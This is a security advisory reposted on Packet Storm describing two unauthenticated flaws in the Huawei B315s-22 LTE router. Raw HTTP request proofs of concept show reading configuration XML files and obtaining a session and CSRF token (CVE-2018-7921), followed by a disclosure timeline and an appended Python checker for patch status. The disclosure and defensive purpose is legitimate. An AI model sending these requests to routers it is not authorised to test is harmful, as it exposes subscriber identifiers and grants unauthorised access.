Huawei B315s-22 Information Disclosure

Usman Saeed
packetstormsecurity.com (PACKETSTORM:150760)
Published: 2018-12-12 00:00:00

EPSS: 0.003 (Low), 68.5th percentile

`#Product Family: LTE  
#Model: B315s-22  
#Firmware version: 21.318.01.00.26  
#Author: Usman Saeed (usman [at] xc0re.net)  
  
1. Unauthenticated access to sensitive files:  
  
It was observed that the web application running on the router allows unauthenticated access to sensitive files on the web server.  
  
POC:  
  
By sending a simple GET request without an authentication cookie, one gets valid responses:  
  
Request:  
GET /config/deviceinformation/config.xml HTTP/1.1  
Host: <omitted>  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
DNT: 1  
Connection: close  
  
Response:  
  
HTTP/1.1 200 OK  
...  
  
<?xml version="1.0" encoding="UTF-8"?>  
<config>  
<devicename>1</devicename>  
<serialnumber>0</serialnumber>  
<imei>1</imei>  
<imsi>1</imsi>  
<iccid>0</iccid>  
<msisdn>1</msisdn>  
<hardwareversion>1</hardwareversion>  
<softwareversion>1</softwareversion>  
...  
  
Other resources accessible are:  
  
/config/dialup/config.xml  
/config/global/config.xml  
/config/global/net-type.xml  
/config/lan/config.xml  
/config/pcassistant/config.xml  
/config/voice/config.xml  
/config/wifi/configure.xml  
  
## After discussion with Huawei: according to them, the consequence of this vulnerability is quite low, thus they marked it as a non-vulnerability.  
  
2. Unauthenticated valid token generation [CVE-2018-7921]  
  
It was observed that an unauthenticated user can generate a "SessionID" and a "__RequestVerificationToken" by simply sending an HTTP GET request to "/api/webserver/SesTokInfo".  
  
These tokens might not give the user full access to the router, but with them one can access several restricted resources on the router.  
  
POC:  
  
First, we send a GET request, as mentioned above.  
  
Request:  
GET /api/webserver/SesTokInfo HTTP/1.1  
Host: <omitted>  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
DNT: 1  
Connection: close  
Content-Length: 0  
  
Response:  
HTTP/1.1 200 OK  
...  
  
<?xml version="1.0" encoding="UTF-8"?>  
<response>  
<SesInfo>SessionID=<omitted></SesInfo>  
<TokInfo><omitted></TokInfo>  
</response>  
  
Now we use these tokens in one of our requests to a resource where authentication is required:  
  
Request:  
GET /api/cradle/status-info HTTP/1.1  
Host: <omitted>  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
__RequestVerificationToken: <omitted>  
X-Requested-With: XMLHttpRequest  
Cookie: SessionID=<omitted>  
DNT: 1  
Connection: close  
  
Response:  
  
HTTP/1.1 200 OK  
...  
  
<?xml version="1.0" encoding="UTF-8"?>  
...  
  
Note that with an invalid or expired authentication session, the response is:  
  
Response:  
HTTP/1.1 200 OK  
...  
  
<?xml version="1.0" encoding="UTF-8"?>  
<error>  
<code>125002</code>  
<message></message>  
</error>  
  
[+] Responsible Disclosure:  
  
Vulnerabilities identified - 31/07/2018  
Reported to Huawei - 31/07/2018  
Huawei patched the vulnerability and issued a CVE - 31/08/2018  
Public disclosure - 01/09/2018  
  
  
`
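As an added example that is not part of the advisory, the following Python checker classifies response bodies of the shape quoted above, so a device owner who has captured responses from unauthenticated requests to their own router can confirm after a firmware update that every listed path now returns the `125002` error rather than configuration data or a token. The sample bodies are constructed from the responses in the advisory (the advisory's `config` response is truncated, so the sample is closed off), and the path list is the one the advisory gives.

```python
import xml.etree.ElementTree as ET

# Endpoints the advisory lists as reachable without authentication.
SENSITIVE_PATHS = [
    "/config/deviceinformation/config.xml",
    "/config/dialup/config.xml",
    "/config/global/config.xml",
    "/config/global/net-type.xml",
    "/config/lan/config.xml",
    "/config/pcassistant/config.xml",
    "/config/voice/config.xml",
    "/config/wifi/configure.xml",
    "/api/webserver/SesTokInfo",
]

# Constructed sample bodies, modelled on the responses quoted in the advisory.
LEAKED_BODY = """<?xml version="1.0" encoding="UTF-8"?>
<config><devicename>1</devicename><serialnumber>0</serialnumber>
<imei>1</imei><imsi>1</imsi></config>"""
TOKEN_BODY = """<?xml version="1.0" encoding="UTF-8"?>
<response><SesInfo>SessionID=EXAMPLE</SesInfo><TokInfo>EXAMPLE</TokInfo></response>"""
DENIED_BODY = """<?xml version="1.0" encoding="UTF-8"?>
<error><code>125002</code><message></message></error>"""


def classify_response(body: str) -> dict:
    """Classify one response body: 'denied' (error element with a code),
    'leak' (device configuration data), 'token' (session/CSRF token handed
    out), or 'unknown' (not parseable XML or an unexpected root)."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return {"status": "unknown"}
    if root.tag == "error":
        return {"status": "denied", "code": root.findtext("code", "")}
    if root.tag == "response" and root.find("SesInfo") is not None:
        return {"status": "token", "fields": [c.tag for c in root]}
    if root.tag == "config":
        return {"status": "leak", "fields": [c.tag for c in root]}
    return {"status": "unknown"}


def still_exposed(responses: dict) -> list:
    """Given {path: body} captured from unauthenticated requests, return the
    paths that still answer with anything other than an error, i.e. unpatched."""
    return [path for path, body in responses.items()
            if classify_response(body)["status"] != "denied"]
```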
